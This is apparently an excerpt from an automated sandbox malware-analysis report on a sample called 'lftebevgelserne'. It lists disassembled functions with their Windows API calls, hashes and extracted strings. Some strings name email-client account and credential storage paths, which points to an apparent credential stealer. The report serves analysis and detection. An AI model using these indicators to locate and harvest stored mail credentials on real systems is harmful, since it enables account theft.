                                                      • Associated: 00000005.00000002.3974120013.000000001F230000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000005.00000002.3974171402.000000001F246000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_1f230000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                      • String ID:
                                                      • API String ID: 1324828854-0
                                                      • Opcode ID: 8423bb3b72badedcbea392d5a107cf15f661ac137164498f3f12592521c5f715
                                                      • Instruction ID: 5116b4487a4d0405cdf7db5196759e868c94a3bf57aebfc46a5e7212d09189d5
                                                      • Opcode Fuzzy Hash: 8423bb3b72badedcbea392d5a107cf15f661ac137164498f3f12592521c5f715
                                                      • Instruction Fuzzy Hash: 4D51B1F1E0025AAFDB00CFA8C895ADEBBB9EF0D311F11411AE552E7291E671A951CF60
                                                      APIs
                                                      • ReadFile.KERNEL32(?,?,?,?), ref: 0040264D
                                                      • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,?), ref: 00402688
                                                      • SetFilePointer.KERNEL32(?,?,?,?,?,00000008,?,?,?,?), ref: 004026AB
                                                      • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,?,?,?,?,00000008,?,?,?,?), ref: 004026C1
                                                        • Part of subcall function 00405CD0: SetFilePointer.KERNEL32(?,00000000,00000000,?), ref: 00405CE6
                                                      • SetFilePointer.KERNEL32(?,?,?,?,?,?,00000002), ref: 0040276D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3957970125.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000005.00000002.3957907247.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.3958046175.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.3958064377.0000000000409000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.3958094050.0000000000448000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.3958094050.000000000048A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: File$Pointer$ByteCharMultiWide$Read
                                                      • String ID: 9
                                                      • API String ID: 163830602-2366072709
                                                      • Opcode ID: fd3803aa03de2e8909da2f617b558eaad47c0c0dea7754e7ccd67b1cd56bd7db
                                                      • Instruction ID: af7b16596185cfa7f969e470bfe402a155c7c568a05af23699f2fbc440ccd5d4
                                                      • Opcode Fuzzy Hash: fd3803aa03de2e8909da2f617b558eaad47c0c0dea7754e7ccd67b1cd56bd7db
                                                      • Instruction Fuzzy Hash: DF514A74D00219AADF209F94C988AAEB779FF04304F50447BE501F72D0D7B89D42DB69
                                                      APIs
                                                      • _ValidateLocalCookies.LIBCMT ref: 1F23339B
                                                      • ___except_validate_context_record.LIBVCRUNTIME ref: 1F2333A3
                                                      • _ValidateLocalCookies.LIBCMT ref: 1F233431
                                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 1F23345C
                                                      • _ValidateLocalCookies.LIBCMT ref: 1F2334B1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3974171402.000000001F231000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F230000, based on PE: true
                                                      • Associated: 00000005.00000002.3974120013.000000001F230000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000005.00000002.3974171402.000000001F246000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_1f230000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                      • String ID: csm
                                                      • API String ID: 1170836740-1018135373
                                                      • Opcode ID: 00568db98df18d4f5ef4eecc361530f1b9d9da5181d70e111fff5613adb3c27d
                                                      • Instruction ID: ea3d45bc39dcec1e3467414c75cb331a5b38916a52182e3d0ea585321518ff50
                                                      • Opcode Fuzzy Hash: 00568db98df18d4f5ef4eecc361530f1b9d9da5181d70e111fff5613adb3c27d
                                                      • Instruction Fuzzy Hash: 5241D1F4E102499BCB01CF68C884ADEBBB5AF48325F208155E9159B351D736FF11CB91
                                                      APIs
                                                      • lstrlenW.KERNEL32(004216C8,00000000,?,00000000,?,?,?,?,?,?,?,?,?,00403160,00000000,?), ref: 004051B1
                                                      • lstrlenW.KERNEL32(00403160,004216C8,00000000,?,00000000,?,?,?,?,?,?,?,?,?,00403160,00000000), ref: 004051C1
                                                      • lstrcatW.KERNEL32(004216C8,00403160,00403160,004216C8,00000000,?,00000000), ref: 004051D4
                                                      • SetWindowTextW.USER32(004216C8,004216C8), ref: 004051E6
                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040520C
                                                      • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405226
                                                      • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405234
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3957970125.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000005.00000002.3957907247.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.3958046175.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.3958064377.0000000000409000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.3958094050.0000000000448000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.3958094050.000000000048A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                      • String ID:
                                                      • API String ID: 2531174081-0
                                                      • Opcode ID: 48f9730a8bf6011ea6331ab33cfc36a895b312cbace33bece7093b226dcfe4f2
                                                      • Instruction ID: 28a23e93becb388afe58fbbf22e110c81461cbae08fd60e06f08ac54b892b673
                                                      • Opcode Fuzzy Hash: 48f9730a8bf6011ea6331ab33cfc36a895b312cbace33bece7093b226dcfe4f2
                                                      • Instruction Fuzzy Hash: 3C218E31900158BBCB219F95DD84ADFBFB8EF55350F10807AF904B62A0C7794A518F68
                                                      APIs
                                                        • Part of subcall function 1F239221: _free.LIBCMT ref: 1F23924A
                                                      • _free.LIBCMT ref: 1F2392AB
                                                        • Part of subcall function 1F23571E: HeapFree.KERNEL32(00000000,00000000,?,1F23924F,?,00000000,?,00000000,?,1F239276,?,00000007,?,?,1F237E5A,?), ref: 1F235734
                                                        • Part of subcall function 1F23571E: GetLastError.KERNEL32(?,?,1F23924F,?,00000000,?,00000000,?,1F239276,?,00000007,?,?,1F237E5A,?,?), ref: 1F235746
                                                      • _free.LIBCMT ref: 1F2392B6
                                                      • _free.LIBCMT ref: 1F2392C1
                                                      • _free.LIBCMT ref: 1F239315
                                                      • _free.LIBCMT ref: 1F239320
                                                      • _free.LIBCMT ref: 1F23932B
                                                      • _free.LIBCMT ref: 1F239336
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3974171402.000000001F231000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F230000, based on PE: true
                                                      • Associated: 00000005.00000002.3974120013.000000001F230000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000005.00000002.3974171402.000000001F246000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_1f230000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: _free$ErrorFreeHeapLast
                                                      • String ID:
                                                      • API String ID: 776569668-0
                                                      • Opcode ID: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                      • Instruction ID: 0e37ee213a40d688c1d6616702f7179674ef607e3144edcb028eb33ab985b620
                                                      • Opcode Fuzzy Hash: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                      • Instruction Fuzzy Hash: 8E1181F5E60B08FAE660EBB0DC46FCB7B9E9F49702F400824A6DE76852DA34F5054752
                                                      APIs
                                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404A5E
                                                      • GetMessagePos.USER32 ref: 00404A66
                                                      • ScreenToClient.USER32(?,?), ref: 00404A80
                                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404A92
                                                      • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404AB8
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3957970125.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000005.00000002.3957907247.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.3958046175.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.3958064377.0000000000409000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.3958094050.0000000000448000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.3958094050.000000000048A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: Message$Send$ClientScreen
                                                      • String ID: f
                                                      • API String ID: 41195575-1993550816
                                                      • Opcode ID: a4b558ae7e4897491015dda9e943decd716cde3204bd09074cb68be28bd0a727
                                                      • Instruction ID: 24e0014d109499f5a76e1caf6b4fbcffaf68b7ceae62979d4c0808fe7bebc9aa
                                                      • Opcode Fuzzy Hash: a4b558ae7e4897491015dda9e943decd716cde3204bd09074cb68be28bd0a727
                                                      • Instruction Fuzzy Hash: A1015271E40219BADB00DB94DD45FFEBBBCAB54711F10012BBB11F62C0D7B4A9018B95
                                                      APIs
                                                      • SetTimer.USER32(?,?,000000FA,00000000), ref: 00402D22
                                                      • MulDiv.KERNEL32(?,00000064,?), ref: 00402D4D
                                                      • wsprintfW.USER32 ref: 00402D5D
                                                      • SetWindowTextW.USER32(?,?), ref: 00402D6D
                                                      • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402D7F
                                                      Strings
                                                      • verifying installer: %d%%, xrefs: 00402D57
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3957970125.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000005.00000002.3957907247.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.3958046175.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.3958064377.0000000000409000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.3958094050.0000000000448000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.3958094050.000000000048A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: Text$ItemTimerWindowwsprintf
                                                      • String ID: verifying installer: %d%%
                                                      • API String ID: 1451636040-82062127
                                                      • Opcode ID: e1c014fc95bc23661624503e4522ac552ab2ae52810cd3c8af91e79be824a7f3
                                                      • Instruction ID: 3cda0e2316cf55cb202c1321fdb8a93457d01500b45ed37e1556afe5f89d55e5
                                                      • Opcode Fuzzy Hash: e1c014fc95bc23661624503e4522ac552ab2ae52810cd3c8af91e79be824a7f3
                                                      • Instruction Fuzzy Hash: 1D014470500209ABEF249F61DD49FEA3B69EB04344F008035FA05A92D0DBB999548B59
                                                      APIs
                                                      • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0040639B
                                                      • wsprintfW.USER32 ref: 004063D6
                                                      • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 004063EA
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3957970125.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000005.00000002.3957907247.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.3958046175.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.3958064377.0000000000409000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.3958094050.0000000000448000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.3958094050.000000000048A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: DirectoryLibraryLoadSystemwsprintf
                                                      • String ID: %s%S.dll$UXTHEME$\
                                                      • API String ID: 2200240437-1946221925
                                                      • Opcode ID: 593f7811ea388f5a47145f6632eb7b382babc1da37006913c6aa5b6fd682aae8
                                                      • Instruction ID: 69ae2dd3acfd93707f2d49264f8241546f9c5af57f384429b5f7a638f8549ddd
                                                      • Opcode Fuzzy Hash: 593f7811ea388f5a47145f6632eb7b382babc1da37006913c6aa5b6fd682aae8
                                                      • Instruction Fuzzy Hash: 6BF0B170910119A7DF14A764DC0DF9B366CA700744F604476AA07F11D1EB7CEB65C7E9
                                                      APIs
                                                      • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,1F236FFD,00000000,?,?,?,1F238A72,?,?,00000100), ref: 1F23887B
                                                      • MultiByteToWideChar.KERNEL32(?,?,?,?,00000000,?,?,?,?,1F238A72,?,?,00000100,5EFC4D8B,?,?), ref: 1F238901
                                                      • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 1F2389FB
                                                      • __freea.LIBCMT ref: 1F238A08
                                                        • Part of subcall function 1F2356D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 1F235702
                                                      • __freea.LIBCMT ref: 1F238A11
                                                      • __freea.LIBCMT ref: 1F238A36
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3974171402.000000001F231000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F230000, based on PE: true
                                                      • Associated: 00000005.00000002.3974120013.000000001F230000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000005.00000002.3974171402.000000001F246000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_1f230000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                      • String ID:
                                                      • API String ID: 1414292761-0
                                                      • Opcode ID: 19664ee9f31f5d7a146af1a475289c06c90e3d104076723e5bfde23eaee69692
                                                      • Instruction ID: c31194b65508643222e6226e6e1c611f302ee9129526d193ba0db81869a0e2f0
                                                      • Opcode Fuzzy Hash: 19664ee9f31f5d7a146af1a475289c06c90e3d104076723e5bfde23eaee69692
                                                      • Instruction Fuzzy Hash: 3151A0F3E1021BABDB15CE64CC81EEB77A9EB4C752F214629F904DE140EBB5EC509690
                                                      APIs
                                                      • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402894
                                                      • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004028B0
                                                      • GlobalFree.KERNEL32(?), ref: 004028E9
                                                      • GlobalFree.KERNEL32(00000000), ref: 004028FC
                                                      • CloseHandle.KERNEL32(?), ref: 00402914
                                                      • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402928
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3957970125.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000005.00000002.3957907247.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.3958046175.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.3958064377.0000000000409000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.3958094050.0000000000448000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.3958094050.000000000048A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                      • String ID:
                                                      • API String ID: 2667972263-0
                                                      • Opcode ID: 9a3160f5cd84cbbbd2e3a7cb11dde0b3899aca8dbbcd50ea506cda6ea3599f41
                                                      • Instruction ID: c1a5639659a60ac5c9bd0712390274ed5d57598099091cca2b2fb0d84b3ff26b
                                                      • Opcode Fuzzy Hash: 9a3160f5cd84cbbbd2e3a7cb11dde0b3899aca8dbbcd50ea506cda6ea3599f41
                                                      • Instruction Fuzzy Hash: 1621AC72C04128BBCF216FA5CD49D9E7E79EF09324F24023AF520762E1C7795D418BA9
                                                      APIs
                                                      • _strlen.LIBCMT ref: 1F231607
                                                      • _strcat.LIBCMT ref: 1F23161D
                                                      • lstrlenW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,1F23190E,?,?,00000000,?,00000000), ref: 1F231643
                                                      • lstrcatW.KERNEL32(?,?,?,?,?,?,1F23190E,?,?,00000000,?,00000000,?,?,?,00000104), ref: 1F23165A
                                                      • lstrlenW.KERNEL32(?,?,?,?,?,1F23190E,?,?,00000000,?,00000000,?,?,?,00000104,?), ref: 1F231661
                                                      • lstrcatW.KERNEL32(00001008,?,?,?,?,?,1F23190E,?,?,00000000,?,00000000,?,?,?,00000104), ref: 1F231686
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3974171402.000000001F231000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F230000, based on PE: true
                                                      • Associated: 00000005.00000002.3974120013.000000001F230000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000005.00000002.3974171402.000000001F246000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_1f230000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: lstrcatlstrlen$_strcat_strlen
                                                      • String ID:
                                                      • API String ID: 1922816806-0
                                                      • Opcode ID: 48750d3a0c9b76a5e1e1573a6edb625018cc885279ca2e6b5c378f2c4d3fd632
                                                      • Instruction ID: 4a1cd837a25f1eae01e527933a96914641a10a850f0e1ff6ddf0f31148e1aa7a
                                                      • Opcode Fuzzy Hash: 48750d3a0c9b76a5e1e1573a6edb625018cc885279ca2e6b5c378f2c4d3fd632
                                                      • Instruction Fuzzy Hash: 8D21DABAE00314ABC705DB64DC84EEE77B8EF8C721F34446AE604AB185DB74B54187A5
                                                      APIs
                                                      • lstrcatW.KERNEL32(?,?,?,?,?,00000000), ref: 1F231038
                                                      • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 1F23104B
                                                      • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 1F231061
                                                      • lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 1F231075
                                                      • GetFileAttributesW.KERNEL32(?,?,?,00000000), ref: 1F231090
                                                      • lstrlenW.KERNEL32(?,?,?,00000000), ref: 1F2310B8
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3974171402.000000001F231000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F230000, based on PE: true
                                                      • Associated: 00000005.00000002.3974120013.000000001F230000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000005.00000002.3974171402.000000001F246000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_1f230000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: lstrlen$AttributesFilelstrcat
                                                      • String ID:
                                                      • API String ID: 3594823470-0
                                                      • Opcode ID: ed48019a30367c23e44719b1198d1e57b117dadc7c656a84ffb37ea16f5c0406
                                                      • Instruction ID: 590d2154c359a451b1ade0794889f3bed2853d08c8a815280002f9c2a54cf4ff
                                                      • Opcode Fuzzy Hash: ed48019a30367c23e44719b1198d1e57b117dadc7c656a84ffb37ea16f5c0406
                                                      • Instruction Fuzzy Hash: 2021A1F5D0032D9BCF10DA60DC58EDB3738EF48725F204296E869971A1DA31AA95CB50
                                                      APIs
                                                      • GetLastError.KERNEL32(?,?,1F233518,1F2323F1,1F231F17), ref: 1F233864
                                                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 1F233872
                                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 1F23388B
                                                      • SetLastError.KERNEL32(00000000,?,1F233518,1F2323F1,1F231F17), ref: 1F2338DD
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3974171402.000000001F231000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F230000, based on PE: true
                                                      • Associated: 00000005.00000002.3974120013.000000001F230000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000005.00000002.3974171402.000000001F246000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_1f230000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: ErrorLastValue___vcrt_
                                                      • String ID:
                                                      • API String ID: 3852720340-0
                                                      • Opcode ID: 1bc2ae968a209725b0f74884511dc09510a7a1690923e7084151f9caaaee7b68
                                                      • Instruction ID: f1fdbec7e2549c7bb807cab800ae1ddc4e6200fc2fe2b239dbd8e11b79f07eb7
                                                      • Opcode Fuzzy Hash: 1bc2ae968a209725b0f74884511dc09510a7a1690923e7084151f9caaaee7b68
                                                      • Instruction Fuzzy Hash: 8F01D4F6E097235EE20459796CC89562B65EF4D777730032AE1109DAE0EF536D259340
                                                      APIs
                                                      • GetLastError.KERNEL32(?,?,1F236C6C), ref: 1F235AFA
                                                      • _free.LIBCMT ref: 1F235B2D
                                                      • _free.LIBCMT ref: 1F235B55
                                                      • SetLastError.KERNEL32(00000000,?,?,1F236C6C), ref: 1F235B62
                                                      • SetLastError.KERNEL32(00000000,?,?,1F236C6C), ref: 1F235B6E
                                                      • _abort.LIBCMT ref: 1F235B74
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3974171402.000000001F231000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F230000, based on PE: true
                                                      • Associated: 00000005.00000002.3974120013.000000001F230000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000005.00000002.3974171402.000000001F246000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_1f230000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast$_free$_abort
                                                      • String ID:
                                                      • API String ID: 3160817290-0
                                                      • Opcode ID: ce0cff4a682175cdf2b242885e7605b710a5b0a184a589cd83aeb4642f1f3d73
                                                      • Instruction ID: c83aa3b8e9d0ab7ebc381c7c118ff01bc18a3772fd46cbe878eedcf630221976
                                                      • Opcode Fuzzy Hash: ce0cff4a682175cdf2b242885e7605b710a5b0a184a589cd83aeb4642f1f3d73
                                                      • Instruction Fuzzy Hash: D0F0C8FAD14713AAC20296346C5BE4E2A6B8FDDA73B350124F81CA7984FE75A9034166
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3957970125.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000005.00000002.3957907247.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.3958046175.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.3958064377.0000000000409000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.3958094050.0000000000448000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.3958094050.000000000048A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: CountTick$wsprintf
                                                      • String ID: ... %d%%
                                                      • API String ID: 551687249-2449383134
                                                      • Opcode ID: 4fb43e65bf4ce807e6280a461f5ece61806fbeac42c13317a2feefb909c66b96
                                                      • Instruction ID: d56137d6e4a505209b2495a9ad0e903af7b2eaecc34ac4602261a913104377f3
                                                      • Opcode Fuzzy Hash: 4fb43e65bf4ce807e6280a461f5ece61806fbeac42c13317a2feefb909c66b96
                                                      • Instruction Fuzzy Hash: 95517A71900219ABCB10CF65D944BAF3FA8AB08766F14457BE911BB2C1C7789E50CBED
                                                      APIs
                                                        • Part of subcall function 1F231E89: lstrlenW.KERNEL32(?,?,?,?,?,1F2310DF,?,?,?,00000000), ref: 1F231E9A
                                                        • Part of subcall function 1F231E89: lstrcatW.KERNEL32(?,?,?,1F2310DF,?,?,?,00000000), ref: 1F231EAC
                                                        • Part of subcall function 1F231E89: lstrlenW.KERNEL32(?,?,1F2310DF,?,?,?,00000000), ref: 1F231EB3
                                                        • Part of subcall function 1F231E89: lstrlenW.KERNEL32(?,?,1F2310DF,?,?,?,00000000), ref: 1F231EC8
                                                        • Part of subcall function 1F231E89: lstrcatW.KERNEL32(?,1F2310DF,?,1F2310DF,?,?,?,00000000), ref: 1F231ED3
                                                      • GetFileAttributesW.KERNEL32(?,?,?,?), ref: 1F23122A
                                                        • Part of subcall function 1F23173A: _strlen.LIBCMT ref: 1F231855
                                                        • Part of subcall function 1F23173A: _strlen.LIBCMT ref: 1F231869
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3974171402.000000001F231000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F230000, based on PE: true
                                                      • Associated: 00000005.00000002.3974120013.000000001F230000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000005.00000002.3974171402.000000001F246000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_1f230000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: lstrlen$_strlenlstrcat$AttributesFile
                                                      • String ID: \Accounts\Account.rec0$\Data\AccCfg\Accounts.tdat$\Mail\$\Storage\
                                                      • API String ID: 4036392271-1520055953
                                                      • Opcode ID: f19774d7b72e5a6495983bec5ec62ef67cbdff141ca5e482ffadebc7df791488
                                                      • Instruction ID: b85b6e674b901e176ab894ad74b5f794cda0ae5761b6ed61ab2417c534049bb2
                                                      • Opcode Fuzzy Hash: f19774d7b72e5a6495983bec5ec62ef67cbdff141ca5e482ffadebc7df791488
                                                      • Instruction Fuzzy Hash: 5621D2F9E503186AEB14D7A0EC91FEE7339EF84B15F201546F604EB1D0EAB16D808759
                                                      APIs
                                                      • lstrlenW.KERNEL32(004226E8,004226E8,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 004049D6
                                                      • wsprintfW.USER32 ref: 004049DF
                                                      • SetDlgItemTextW.USER32(?,004226E8), ref: 004049F2
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3957970125.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000005.00000002.3957907247.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.3958046175.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.3958064377.0000000000409000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.3958094050.0000000000448000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.3958094050.000000000048A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: ItemTextlstrlenwsprintf
                                                      • String ID: %u.%u%s%s$&B
                                                      • API String ID: 3540041739-2907463167
                                                      • Opcode ID: 770447f35da1f277c6ac85a7c0a518b54e4afc88f1f53f93581291e47916563d
                                                      • Instruction ID: 7355c158aba8d6b586dda53eb311f6ba2c540b654501303b209b4c25e60a8b93
                                                      • Opcode Fuzzy Hash: 770447f35da1f277c6ac85a7c0a518b54e4afc88f1f53f93581291e47916563d
                                                      • Instruction Fuzzy Hash: 4711D8736041387BEB10A57D9C41E9F368C9B85374F250237FA26F61D2DA79C81282E8
                                                      APIs
                                                      • CharNextW.USER32(?,*?|<>/":,00000000,00000000,75573420,00436800,00434000,00403245,00436800,00436800,00403492), ref: 00406311
                                                      • CharNextW.USER32(?,?,?,00000000), ref: 00406320
